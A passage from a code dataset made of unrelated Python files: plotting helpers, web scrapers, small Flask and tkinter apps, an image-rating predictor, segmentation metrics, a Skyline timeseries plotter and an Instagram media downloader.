**kwargs):\n \"\"\"Given two column names, this function prints their correlation coefficient and displays them in a scatterplot.\"\"\"\n r = round(X.corr().loc[xname, yname], 3)\n print('Correlation Coefficient: {0}'.format(r))\n fig, ax = plt.subplots(**kwargs)\n sns.scatterplot(\n data=X, \n x=xname,\n y=yname,\n ax=ax\n )\n plt.show()\n\ndef plot_corr_matrix(X, **kwargs):\n \"\"\"Given a dataframe, this function calculates its correlation matrix and 
displays it as a triangular heatmap.\"\"\"\n corr = X.corr()\n mask = np.triu(np.ones_like(corr, dtype=bool)) # mask for the upper triangle \n fig, ax = plt.subplots(**kwargs)\n cmap = sns.diverging_palette(230, 20, as_cmap=True)\n sns.heatmap(\n corr,\n mask=mask,\n cmap=cmap,\n vmax=1, # maximum possible correlation coefficient \n vmin=-1, # minimum possible correlation coefficient \n center=0, # center of possible correlation coefficients \n annot=True, # display correlation coefficients \n fmt=\".2f\", # round correlation coefficients to 2 decimal places\n ax=ax\n )\n return fig\n\ndef plot_loadings(pca_results, component, **kwargs):\n fig, ax = plt.subplots(**kwargs)\n ax = pca_results['loadings'].loc[component].sort_values().plot(kind='barh')\n plt.xlabel('Loading')\n title = \"{0} Loadings\".format(component)\n plt.title(title)\n plt.show()\n\ndef reachability_plot(optics, eps=np.inf, clusters=None, **kwargs):\n x = np.arange(len(optics.labels_))\n reachability = optics.reachability_\n ordering = optics.ordering_\n fig, ax = plt.subplots(**kwargs)\n sns.scatterplot(\n x=x,\n y=reachability[ordering],\n hue=clusters[ordering],\n alpha=0.3,\n linewidth=0,\n ax=ax\n )\n ax.plot(np.full_like(x, eps, dtype=float), \"k-\", alpha=0.5, label='threshold')\n plt.legend()\n ax.set_ylabel('Reachability (epsilon distance)')\n return fig\n","repo_name":"andrewabeles/anomalous-companies","sub_path":"src/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32881359282","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef get_wewo_soup(word):\n url = f'https://weworkremotely.com/remote-jobs/search?term={word}'\n res = requests.get(url)\n soup = BeautifulSoup(res.text,'html.parser')\n item_box = soup.find('div',{'id':'job_list'}).find_all('ul')\n return item_box\n\ndef extract_wewo_jobs(word):\n url = 'https://weworkremotely.com/'\n info_dict = []\n item_box = get_wewo_soup(word)\n for item in item_box:\n box = item.find_all('li')\n for list in box:\n try:\n title = list.find('span',{'class':'title'}).text\n company = list.find('span',{'class':'company'}).text\n location = list.find('span',{'class':'region company'}).text\n link = url+list.find('a')['href']\n dict = {'title':title,\n 'company':company,\n 'location':location,\n 'link':link}\n info_dict.append(dict)\n except:\n pass\n\n return info_dict\n \n","repo_name":"ankiyong/MultiScrapper","sub_path":"weworkremotely.py","file_name":"weworkremotely.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"75333447256","text":"from flask import Flask, render_template\nfrom markupsafe import escape\n \napp = Flask(__name__)\n \nprendas ={\n100:{ \"tipo\":\"pantalon\",\"talle\":\"S\"},\n101:{ \"tipo\":\"remera\",\"talle\":\"M\"}\n}\n \n@app.get('/')\ndef home():\n return 'Bienvenidos a Macowins!' 
#c/vez que hacen un request a la app de macowins, devuelve esto.\n \n# @app.get('/prendas/') #escuchá en esta url\n# def get_prendas():\n# return f'Estas son las prendas {prendas}'\n \n@app.get('/prendas/')\ndef get_prendas():\n return render_template(\"prendas.html\",prendas = prendas.items())\n \n#pruebo con localhost:5000/prendas/\n \n# @app.get('/prendas/')\n# def get_prenda(id):\n# prenda_talle = ''\n# for prenda in prendas:\n# if prenda['id']!=id:\n# prenda_talle = prenda['talle']\n# return f'La prenda {id} es talle: {prenda_talle}'\n \n@app.get('/prendas/')\ndef get_prenda(id):\n if id in prendas:\n prenda = prendas[id]\n return render_template(\"prenda.html\",id=id,prenda=prenda)\n else:\n return f'No se encuentra la prenda. Error 404'","repo_name":"franciscohalac/Practicas","sub_path":"tp7/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25586270271","text":"from pprint import pprint\n\nC = int(input()) \nN = int(input()) # 연결되어 있는 컴퓨터 쌍의 수\ngraph = [[]*C for _ in range(C+1)] # (인접행렬) 정점의 갯수만큼 생성\n\nfor _ in range(N):\n u, v = map(int, input().split()) # 간선의 양 끝점 u, v\n graph[u].append(v) # 인접 리스트\n graph[v].append(u)\n\ncnt = 0\nvisited = [0]*(C+1)\ndef dfs(start):\n global cnt # 함수에 사용된 cnt는 지역변수라서 함수 바깥의 영역에서 호출하려면 global 선언 필요\n visited[start] = 1\n for i in graph[start]:\n if visited[i] == 0:\n dfs(i)\n cnt += 1\n\ndfs(1)\nprint(cnt)","repo_name":"jn-97/01-ALGORITHM","sub_path":"2회차/김지연/20220809/1_바이러스.py","file_name":"1_바이러스.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74442605017","text":"\"\"\"\nThis module represents the Producer.\n\nComputer Systems Architecture Course\nAssignment 1\nMarch 2020\n\"\"\"\n\nfrom threading import Thread\nimport time\n\n\nclass Producer(Thread):\n \"\"\"\n Class that represents a producer.\n \"\"\"\n\n def __init__(self, products, marketplace, republish_wait_time, **kwargs):\n \"\"\"\n Constructor.\n\n @type products: List()\n @param products: a list of products that the producer will produce\n\n @type marketplace: Marketplace\n @param marketplace: a reference to the marketplace\n\n @type republish_wait_time: Time\n @param republish_wait_time: the number of seconds that a producer must\n wait until the marketplace becomes available\n\n @type kwargs:\n @param kwargs: other arguments that are passed to the Thread's __init__()\n \"\"\"\n self.products = products\n self.marketplace = marketplace\n self.wait_time = republish_wait_time\n Thread.__init__(self, **kwargs)\n\n def run(self):\n id_crt = self.marketplace.register_producer()\n\n while True:\n for poz in self.products:\n # poz = elementul curent in lista producatorului\n # de produse (no inspiration, sorry)\n (prod, cantitate_curr, timp_productie_curr) = poz\n # imi setez in variabile valorile necesare prelucrarilor\n time.sleep(cantitate_curr * timp_productie_curr)\n # astept ca elementul curent sa fie produs in cantitatea dorita\n index = 0\n while index < cantitate_curr:\n # incep publicare si pun produs cu produs pana cand ajung\n # la cantitatea dorita\n if not self.marketplace.publish(id_crt, prod):\n # daca nu reusesc -> queue plin deci astept\n time.sleep(self.wait_time)\n while not self.marketplace.publish(id_crt, prod):\n # cat timp intampin probleme cu publicarea\n # (nu am loc in coada) astept\n time.sleep(self.wait_time)\n index += 1 # 
cand reusesc sa il public , incrementez\n else: # indexul pt a ajunge la numarul\n index += 1 # dorit de publicari (cantitate)\n","repo_name":"CezarMarcu98/Arhitectura-Sistemelor-de-Calcul---Project-1","sub_path":"producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33577173575","text":"class Application(ttk.Frame):\n \n def __init__(self, main_window):\n super().__init__(main_window)\n main_window.title(\"Lista en Tcl/Tk\")\n \n # Crear una barra de deslizamiento con orientación vertical.\n scrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)\n # Vincularla con la lista.\n self.listbox = tk.Listbox(self, yscrollcommand=scrollbar.set)\n \n # Insertar 20 elementos.\n for i in range(20):\n self.listbox.insert(tk.END, \"Elemento {}\".format(i))\n \n scrollbar.config(command=self.listbox.yview)\n # Ubicarla a la derecha.\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n self.listbox.pack()\n \n self.pack()\n","repo_name":"3vanDrop/python","sub_path":"tkinter/samples/listbox.py","file_name":"listbox.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"22096847999","text":"import pandas as pd\nfrom pathlib import Path\n\nimport IPython.display\nimport numpy as np\nimport matplotlib as plt\nfrom fastai.data.all import *\nfrom fastai.vision.all import *\nfrom scipy import stats\n\nwd = Path(r'./data/SCUT-FBP5500_v2')\noutput = wd / 'myoutputs'\nimages_path = wd/'Images'\n\ncm_ratings = pd.read_excel(wd/'All_Ratings.xlsx',sheet_name='Caucasian_Male') \nprint(load_learner)\nsorted_cm_df = cm_ratings.groupby('Filename').mean('Rating').sort_values(by=['Rating'])\ncm_ratings = {}\nsorted_cm_list = []\nfor index,row in sorted_cm_df.iterrows():\n cm_ratings[index] = row[\"Rating\"]\n sorted_cm_list.append([index,row[\"Rating\"]])\n\ndef get_cm_paths(path):\n return list(path.glob('CM*'))\n\ndef get_rating(path):\n return cm_ratings[path.name]\n\ndef modified_get_image(images_path):\n print(images_path)\n images_list = get_image_files(images_path)\n print([pathi for pathi in images_list if pathi.name in cm_ratings.keys()]) \n # raise ValueError(cm_ratings[images_list[0].name])\n return [pathi for pathi in images_list ]\n\ncm_block = DataBlock(\n blocks=(ImageBlock,RegressionBlock(n_out=1)),\n # get_items=modified_get_image,\n get_items=get_cm_paths,\n get_y=get_rating,\n splitter=RandomSplitter(valid_pct=0.2, seed=42),\n)\n\ncm_data = cm_block.dataloaders(images_path)\n\nlearn = cnn_learner(cm_data,resnet34,metrics=mae)\nlearn.load('./model_25')\nlearn.export(fname='./models/export.pkl')\n\n\nlearn2 = load_learner(r'./models/export.pkl')\nprint( learn2.predict(r'./resources/CM4.jpg'))\n\n\ndef predict( file_name):\n # getrating\n return learn2.predict(file_name)\n\n # if __name__ == '__main__': \n# print(predict(r'./resources/CM4.jpg'))\n# print(predict(r'./resources/rate.png'))\n\n# print(predict(r'./resources/CM1.jpg'))\n# print(predict(r'./resources/CM11.jpg'))\n","repo_name":"aminehd/selfie_backend","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70352220697","text":"import torch\nimport numpy as np\nimport sklearn.metrics as metrics\n\n\ndef confusion_matrix(predict, target):\n return metrics.confusion_matrix(target, 
predict)\n\n\ndef jaccard_score(predict, target):\n \"\"\"计算jaccard相似系数\n\n :param predict:\n :param target:\n :return:\n \"\"\"\n return metrics.jaccard_score(target, predict)\n\n\ndef dice_coef(predict, target, ep=1e-8):\n \"\"\"dice相似系数(值域为[0,1]),也称为重叠指数,表示两个物体相交的面积占总面积的比值\n 用于相似性评估\n\n :param ep: 平滑系数\n :param predict: 预测值(类别,非概率)\n :param target: 目标值\n :return: 相似系数\n \"\"\"\n num = predict.size(0)\n pre = predict.view(num, -1)\n tar = target.view(num, -1)\n intersection = (pre * tar).sum()\n return (2. * intersection + ep) / (pre.sum() + tar.sum() + ep)\n\n\ndef IoU(predict, target):\n \"\"\"计算IoU\n\n :param predict: 预测值\n :param target: 真实值\n :return: IoU值\n \"\"\"\n # todo 完成IoU指标的计算\n pass\n\n\ndef mIoU(predict, target):\n pass\n\n\ndef recall(predict, target):\n \"\"\"敏感度,即召回率\n recall/sensitivity = TP / (TP + FN)\n\n :param predict: 预测值\n :param target: 真实值\n :return: 敏感度\n \"\"\"\n predict, target = _process(predict, target)\n tp = np.count_nonzero(predict & target)\n fn = np.count_nonzero(~predict & target) # ~表示取反\n try:\n rec = tp / float(tp + fn)\n except ZeroDivisionError:\n rec = 0.0\n return rec\n\n\ndef precision(predict, target):\n \"\"\"计算精度\n precision = TP / (TP + FP)\n\n :param predict: 预测值\n :param target: 真实值\n :return: 精度值\n \"\"\"\n predict, target = _process(predict, target)\n tp = np.count_nonzero(predict & target)\n fp = np.count_nonzero(predict & ~target)\n try:\n pr = tp / (tp + fp)\n except ZeroDivisionError:\n pr = 0.0\n return pr\n\n\ndef specificity(predict, target):\n \"\"\"计算特异性\n specificity = TN / (TN + FP)\n\n :param predict:\n :param target:\n :return:\n \"\"\"\n predict, target = _process(predict, target)\n tn = np.count_nonzero(~predict & ~target)\n fp = np.count_nonzero(predict & ~target)\n try:\n spec = tn / float(tn + fp)\n except ZeroDivisionError:\n spec = 0.0\n return spec\n\n\ndef _process(predict, target):\n if torch.is_tensor(predict):\n predict = torch.sigmoid(predict).data.cpu().numpy()\n if torch.is_tensor(target):\n target = target.data.cpu().numpy()\n # use the builtin bool: the np.bool alias was removed in numpy >= 1.24\n predict = np.atleast_1d(predict.astype(bool))\n target = np.atleast_1d(target.astype(bool))\n return predict, target\n","repo_name":"chunlei95/Covid19CT-Segmentation","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73607196378","text":"#!/usr/bin/env python3\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport re\r\nimport sys\r\nimport os\r\nimport http.cookiejar\r\nimport json\r\nimport urllib.request, urllib.error, urllib.parse\r\nfrom csv import reader\r\nfrom csv import DictReader\r\n\r\ndef get_soup(url,header):\r\n #return BeautifulSoup(urllib2.urlopen(urllib2.Request(url,headers=header)),\r\n # 'html.parser')\r\n return BeautifulSoup(urllib.request.urlopen(\r\n urllib.request.Request(url,headers=header)),\r\n 'html.parser')\r\nw=0\r\nwith open('titles.csv', 'r') as read_obj:\r\n csv_dict_reader = DictReader(read_obj)\r\n for row in csv_dict_reader:\r\n\r\n # row variable is a list that represents a row in csv\r\n w= w+1\r\n query = row['Description']\r\n query_name= query\r\n query= query.split()\r\n query='+'.join(query)\r\n url=\"http://www.bing.com/images/search?q=\" + query + \"&FORM=HDRSC2\"\r\n\r\n #add the directory for your image here\r\n DIR=\"Pictures\"\r\n header={'User-Agent':\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36\"}\r\n soup 
= get_soup(url,header)\r\n\r\n ActualImages=[]# contains the link for Large original images, type of image\r\n\r\n for a in soup.find_all(\"a\",{\"class\":\"iusc\"}):\r\n #print(a)\r\n # mad = json.loads(a[\"mad\"])\r\n # turl = mad[\"turl\"]\r\n m = json.loads(a[\"m\"])\r\n murl = m[\"murl\"]\r\n turl = m[\"turl\"]\r\n\r\n image_name = urllib.parse.urlsplit(murl).path.split(\"/\")[-1]\r\n\r\n print(w, end=' ')\r\n print(query_name)\r\n\r\n ActualImages.append((image_name, turl, murl))\r\n break\r\n\r\n\r\n #print(\"there are total\" , len(ActualImages),\"images\")\r\n\r\n if not os.path.exists(DIR):\r\n os.mkdir(DIR)\r\n\r\n #DIR = os.path.join(DIR, query.split()[0])\r\n if not os.path.exists(DIR):\r\n os.mkdir(DIR)\r\n\r\n ##print images\r\n for i, (image_name, turl, murl) in enumerate(ActualImages):\r\n try:\r\n\r\n #req = urllib2.Request(turl, headers={'User-Agent' : header})\r\n #raw_img = urllib2.urlopen(req).read()\r\n #req = urllib.request.Request(turl, headers={'User-Agent' : header})\r\n raw_img = urllib.request.urlopen(turl).read()\r\n\r\n cntr = len([i for i in os.listdir(DIR) if image_name in i]) + 1\r\n #print cntr\r\n\r\n f = open(os.path.join(DIR, query_name + \".jpg\"), 'wb')\r\n f.write(raw_img)\r\n f.close()\r\n except Exception as e:\r\n print(\"could not load : \" + query_name)\r\n print(e)\r\n","repo_name":"Gargooie/web_image_scrapper","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4416424946","text":"\"\"\"\nplot_timeseries.py\n\"\"\"\nimport logging\nimport os\nimport traceback\nimport datetime as dt\nimport textwrap\nimport matplotlib\nmatplotlib.use('Agg')\n\nload_libraries = True\nif load_libraries:\n import matplotlib.pyplot as plt\n from matplotlib.pylab import rcParams\n from matplotlib.dates import DateFormatter\n # @added 20230626 - Task #4962: Build and test skyline v4.0.0\n # Task #4778: v4.0.0 - update dependencies\n # As per https://matplotlib.org/stable/api/prev_api_changes/api_changes_3.7.0.html#the-first-parameter-of-axes-grid-and-axis-grid-has-been-renamed-to-visible\n from matplotlib import __version__ as matplotlib_version\n\n\ndef plot_timeseries(\n current_skyline_app, metric, timeseries, output_file,\n plot_parameters={\n 'title': None, 'line_color': 'blue', 'bg_color': 'black',\n 'figsize': (8, 4)\n }):\n \"\"\"\n Creates a png graph image using the time series data and returns the path\n and filename.\n\n :param current_skyline_app: skyline_app\n :param metric: the name of the metric\n :param timeseries: the timeseries to plot\n :param title: the plot title\n :param output_file: the full path and filename (including .png extension) to\n save to plot as\n :type current_skyline_app: str\n :type metric: str\n :type timeseries: list\n :type title: str\n :type output_file: str\n :return: output_file\n :rtype: str\n\n \"\"\"\n\n function_str = 'functions.plot.plot_timeseries'\n current_skyline_app_logger = current_skyline_app + 'Log'\n current_logger = logging.getLogger(current_skyline_app_logger)\n\n if os.path.isfile(output_file):\n current_logger.info('%s :: %s :: image of %s exists' % (\n str(current_skyline_app), function_str, metric))\n return (True, output_file)\n\n current_logger.info('%s :: %s :: plotting %s ' % (\n str(current_skyline_app), function_str, metric))\n\n try:\n current_logger.info('%s :: creating graph image - %s' % (function_str, output_file))\n output_dir = 
os.path.dirname(output_file)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, mode=0o755)\n\n timeseries_duration = timeseries[-1][0] - timeseries[0][0]\n title = plot_parameters['title']\n if not title:\n if timeseries_duration <= 86400:\n period = timeseries_duration / 60 / 60\n title = '%s hours' % str(period)\n else:\n period = timeseries_duration / 60 / 60 / 24\n title = '%s days' % str(period)\n\n # @added 20230102 - Task #2732: Prometheus to Skyline\n # Branch #4300: prometheus\n # Report correct days for new metrics\n if 'days' in title:\n try:\n replace_days = False\n title_days_str = title.split(' ')[0]\n title_days = float(title_days_str)\n days = round((timeseries_duration / 86400), 1)\n if days < 7.0:\n replace_days = True\n if '30 days' in title and days < title_days:\n replace_days = True\n if replace_days:\n replace_days_str = '%s days' % title_days_str\n new_days_str = '%s days' % str(days)\n title = title.replace(replace_days_str, new_days_str)\n title = '%s - (%s not available)' % (title, replace_days_str)\n current_logger.info('%s :: %s :: corrected duration in title changed %s days to %s days' % (\n str(current_skyline_app), function_str, replace_days_str, new_days_str))\n except Exception as err:\n current_logger.error('%s :: %s :: an error occurred checking days duration in title - %s' % (\n str(current_skyline_app), function_str, err))\n\n # Plot match\n # rcParams['figure.figsize'] = 8, 4\n rcParams['figure.figsize'] = plot_parameters['figsize']\n fig = plt.figure(frameon=False)\n ax = fig.add_subplot(111)\n\n graph_title = str(title)\n title_fontsize = 'medium'\n if len(title) > 200:\n graph_title = textwrap.fill(title, width=140, break_long_words=False)\n title_fontsize = 'xx-small'\n\n fontsize = 'small'\n use_label = str(metric)\n if len(metric) > 200:\n use_label = textwrap.fill(metric, width=140, break_long_words=True)\n fontsize = 'xx-small'\n\n ax.set_title(graph_title, fontsize=title_fontsize)\n if hasattr(ax, 'set_facecolor'):\n ax.set_facecolor(plot_parameters['bg_color'])\n else:\n ax.set_axis_bgcolor(plot_parameters['bg_color'])\n datetimes = [dt.datetime.utcfromtimestamp(int(item[0])) for item in timeseries]\n plt.xticks(rotation=0, horizontalalignment='center')\n if timeseries_duration <= 86400:\n xfmt = DateFormatter('%H:%M:%S')\n else:\n xfmt = DateFormatter('%Y-%m-%d')\n\n plt.gca().xaxis.set_major_formatter(xfmt)\n ax.xaxis.set_major_formatter(xfmt)\n\n values = [float(item[1]) for item in timeseries]\n ax.plot(\n datetimes, values, label=use_label,\n color=plot_parameters['line_color'], lw=1,\n linestyle='solid')\n ax.tick_params(axis='both', labelsize='small')\n try:\n ax.get_yaxis().get_major_formatter().set_useOffset(False)\n except Exception as err:\n current_logger.warning('warning :: %s :: get_major_formatter - %s' % (function_str, err))\n try:\n ax.get_yaxis().get_major_formatter().set_scientific(False)\n except Exception as err:\n current_logger.warning('warning :: %s :: get_major_formatter - %s' % (function_str, err))\n\n box = ax.get_position()\n ax.set_position([box.x0, box.y0 + box.height * 0.1,\n box.width, box.height * 0.9])\n ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),\n fancybox=True, shadow=True, ncol=2, fontsize=fontsize)\n plt.rc('lines', lw=1, color='black')\n plt.grid(True)\n # @modified 20230626 - Task #4962: Build and test skyline v4.0.0\n # Task #4778: v4.0.0 - update dependencies\n # As per 
https://matplotlib.org/stable/api/prev_api_changes/api_changes_3.7.0.html#the-first-parameter-of-axes-grid-and-axis-grid-has-been-renamed-to-visible\n if matplotlib_version < '3.7.0':\n ax.grid(b=True, which='both', axis='both', color='lightgray',\n linestyle='solid', alpha=0.5, linewidth=0.6)\n else:\n ax.grid(visible=True, which='both', axis='both', color='lightgray',\n linestyle='solid', alpha=0.5, linewidth=0.6)\n\n if hasattr(ax, 'set_facecolor'):\n ax.set_facecolor(plot_parameters['bg_color'])\n else:\n ax.set_axis_bgcolor(plot_parameters['bg_color'])\n rcParams['xtick.direction'] = 'out'\n rcParams['ytick.direction'] = 'out'\n ax.margins(y=.02, x=.03)\n plt.savefig(output_file, format='png')\n fig.clf()\n plt.close(fig)\n current_logger.info('%s :: created graph image - %s' % (function_str, output_file))\n except:\n current_logger.error(traceback.format_exc())\n current_logger.error('error :: %s :: failed to create %s' % (function_str, output_file))\n return (False, None)\n\n return (True, output_file)\n","repo_name":"earthgecko/skyline","sub_path":"skyline/functions/plots/plot_timeseries.py","file_name":"plot_timeseries.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","stars":464,"dataset":"github-code","pt":"68"} +{"seq_id":"41175890890","text":"from core import app\nfrom flask import render_template, send_file, request, flash, url_for, redirect, Response\nfrom io import BytesIO\nfrom decouple import config\nimport os\nfrom core import ig\nimport shutil\n\n\nIG_USERNAME = config('IG_USERNAME', default='username')\nIG_PASSWORD = config('IG_PASSWORD', default='password')\n\n\n@app.route('/ig-downloader/profile-pic', methods=['GET', 'POST'])\ndef ig_dp_downloader():\n if request.method == 'POST':\n try:\n username = request.form.get('username')\n if 'instagram.com' in username:\n flash('Please enter Instagram username, and not a link!', 'error')\n return redirect(url_for('ig_dp_downloader'))\n filename = ig.download_profile_picture(username)\n file_path = os.path.join(os.path.abspath(username), filename)\n return_img = BytesIO()\n with open(file_path, 'rb') as fp:\n return_img.write(fp.read())\n return_img.seek(0)\n os.remove(file_path)\n os.removedirs(os.path.abspath(username))\n return send_file(return_img, mimetype='image/jpg', as_attachment=True, attachment_filename=f'{username}.jpg')\n except Exception as e:\n print(e)\n flash('Unable to fetch and download the profile picture, try again!', 'error')\n return redirect(url_for('ig_dp_downloader'))\n\n return render_template('instagram/profile_pic.html', title=\"Download Profile Picture\")\n\n\n@app.route('/ig-downloader/latest-stories', methods=['GET', 'POST'])\ndef ig_stories_downloader():\n if request.method == 'POST':\n try:\n username = request.form.get('username')\n if 'instagram.com' in username:\n flash('Please enter Instagram username, and not a link!', 'error')\n return redirect(url_for('ig_dp_downloader'))\n filename = ig.download_latest_stories(username)\n with open(os.path.abspath(filename), 'rb') as fp:\n data = fp.readlines()\n os.remove(os.path.abspath(filename))\n return Response(\n data,\n headers={\n 'Content-Type': 'application/zip',\n 'Content-Disposition': f'attachment; filename={filename}'\n }\n )\n except Exception as e:\n print(e)\n flash('Unable to fetch and download the stories, try again!', 'error')\n return redirect(url_for('ig_stories_downloader'))\n\n return render_template('instagram/stories.html', title=\"Download Latest 
Stories\")\n\n\n@app.route('/ig-downloader/image', methods=['GET', 'POST'])\ndef ig_image_downloader():\n if request.method == 'POST':\n try:\n post_url = request.form.get('post-url')\n post_url = post_url.replace(\n \"https://instagram\", \"https://www.instagram\")\n post_url = post_url.replace(\n \"https://m.instagram\", \"https://www.instagram\")\n filename = ig.download_image(post_url)\n if filename:\n if 'jpg' in filename:\n return_img = BytesIO()\n with open(filename, 'rb') as fp:\n return_img.write(fp.read())\n return_img.seek(0)\n os.remove(filename)\n return send_file(return_img, mimetype='image/jpg', as_attachment=True, attachment_filename=filename)\n elif 'zip' in filename:\n with open(os.path.abspath(filename), 'rb') as fp:\n data = fp.readlines()\n os.remove(os.path.abspath(filename))\n return Response(\n data,\n headers={\n 'Content-Type': 'application/zip',\n 'Content-Disposition': f'attachment; filename={filename}'\n }\n )\n else:\n flash(\n 'Please make sure the account is not private and the post contains image only!', 'error')\n return redirect(url_for('ig_image_downloader'))\n except Exception as e:\n print(e)\n flash('Unable to fetch and download the profile picture, try again!', 'error')\n return redirect(url_for('ig_image_downloader'))\n\n return render_template('instagram/picture.html', title='Download Images')\n\n\n@app.route('/ig-downloader/video', methods=['GET', 'POST'])\ndef ig_video_downloader():\n if request.method == 'POST':\n try:\n video_url = request.form.get('video-url')\n video_url = video_url.replace(\n \"https://instagram\", \"https://www.instagram\")\n video_url = video_url.replace(\n \"https://m.instagram\", \"https://www.instagram\")\n folder_name = ig.download_video(video_url)\n\n # Delete after sending\n\n for (dirpath, dirnames, filenames) in os.walk(os.path.abspath(folder_name)):\n if not 'temp' in filenames[0]:\n return_video = BytesIO()\n with open(os.path.join(os.path.abspath(folder_name), filenames[0]), 'rb') as fp:\n return_video.write(fp.read())\n return_video.seek(0)\n shutil.rmtree(os.path.abspath(folder_name))\n return send_file(return_video, as_attachment=True, attachment_filename=f'{folder_name}.mp4')\n except Exception as e:\n print(e)\n flash('Unable to fetch and download the video, try again!', 'error')\n return redirect(url_for('ig_video_downloader'))\n\n return render_template('instagram/video.html', title='Download Videos')\n","repo_name":"ashutoshkrris/EazyLoader","sub_path":"core/routes/instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"68"} +{"seq_id":"42989413571","text":"# -*- coding: utf-8 -*-\nfrom functools import partial\nimport Tkinter as tk\nimport tkMessageBox\nfrom my_finance.model import User, Finance\n\ncurrent_user = None\ncurrent_finance = None\n\nTITLE_FONT = ('Helvetica', 18, 'bold')\nCONS_SEX = dict([(1, u'男'), (2, u'女')])\nCONS_TYPE = dict([(1, u'收入'), (2, u'支出')])\n\nSTICKY_W_E_N_S = tk.W+tk.E+tk.N+tk.S\n\n\nclass App(tk.Tk):\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n container = tk.Frame(self)\n container.pack(side='top', fill='both', expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n self.container = container\n self.frames = {}\n\n def set_pages(self, pages, force_update=False):\n for F in pages:\n page_name = F.__name__\n if page_name in self.frames and not force_update:\n continue\n frame 
= F(self.container, self)\n self.frames[page_name] = frame\n frame.grid(row=0, column=0, sticky='nsew')\n\n def show_frame(self, page_name):\n frame = self.frames[page_name]\n frame.tkraise()\n\n\nclass LoginPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n tk.Label(self, text=u'用户名:').grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'密 码:').grid(row=1, sticky=tk.W)\n\n usernameinput = tk.Entry(self)\n usernameinput.grid(row=0, column=1, columnspan=2)\n passwdinput = tk.Entry(self, show='*')\n passwdinput.grid(row=1, column=1, columnspan=2)\n\n def clear_callback():\n usernameinput.delete(0, tk.END)\n passwdinput.delete(0, tk.END)\n\n def login_callback():\n username = usernameinput.get()\n username = username.strip()\n passwd = passwdinput.get()\n passwd = passwd.strip()\n\n global current_user\n current_user = User.login(username, passwd)\n if current_user:\n self.controller.set_pages([HomePage])\n self.controller.show_frame('HomePage')\n else:\n tkMessageBox.showinfo('Error', 'Login Failure!')\n\n tk.Button(self, text=u'登 录', command=login_callback).grid(row=2, column=1)\n tk.Button(self, text=u'清 空', command=clear_callback).grid(row=2, column=2)\n\n\nclass HomePage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n\n global current_user\n tk.Label(self, text=u'姓 名: %s' % current_user.name).grid(row=0, sticky=tk.W)\n tk.Label(self, text=u'性 别: %s' % CONS_SEX[current_user.sex]).grid(row=1, sticky=tk.W)\n tk.Label(self, text=u'注册时间: %s' % current_user.create_date).grid(row=2, sticky=tk.W)\n\n def edit_user_callback():\n self.controller.set_pages([UserEditPage])\n self.controller.show_frame('UserEditPage')\n\n tk.Button(self, text='编辑', command=edit_user_callback).grid(row=0, column=1)\n\n finance_list = Finance.get_list(current_user.id)\n\n def add_finance_callback():\n self.controller.set_pages([FinanceAddPage])\n self.controller.show_frame('FinanceAddPage')\n\n def delete_finance_callback(fid):\n Finance.delete(fid)\n self.controller.set_pages([HomePage], force_update=True)\n\n def edit_finance_callback(fid):\n global current_finance\n current_finance = Finance.get(fid)\n self.controller.set_pages([FinanceEditPage], force_update=True)\n self.controller.show_frame('FinanceEditPage')\n\n if finance_list:\n finance_list_length = len(finance_list)\n total_input = 0\n total_output = 0\n\n tk.Label(self, text=u'').grid(row=4)\n tk.Label(self, text=u'添加时间', bg='green').grid(row=5, column=0, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=u'类型', bg='green').grid(row=5, column=1, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=u'金额', bg='green').grid(row=5, column=2, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=u'注释', bg='green').grid(row=5, column=3, sticky=STICKY_W_E_N_S)\n tk.Label(self, text=u'操作', bg='green').grid(row=5, column=4, columnspan=2, sticky=STICKY_W_E_N_S)\n for idx, finance in enumerate(finance_list):\n if finance.type == 1:\n total_input += finance.amount\n elif finance.type == 2:\n total_output += finance.amount\n\n if idx % 2 == 0:\n tk.Label(self, 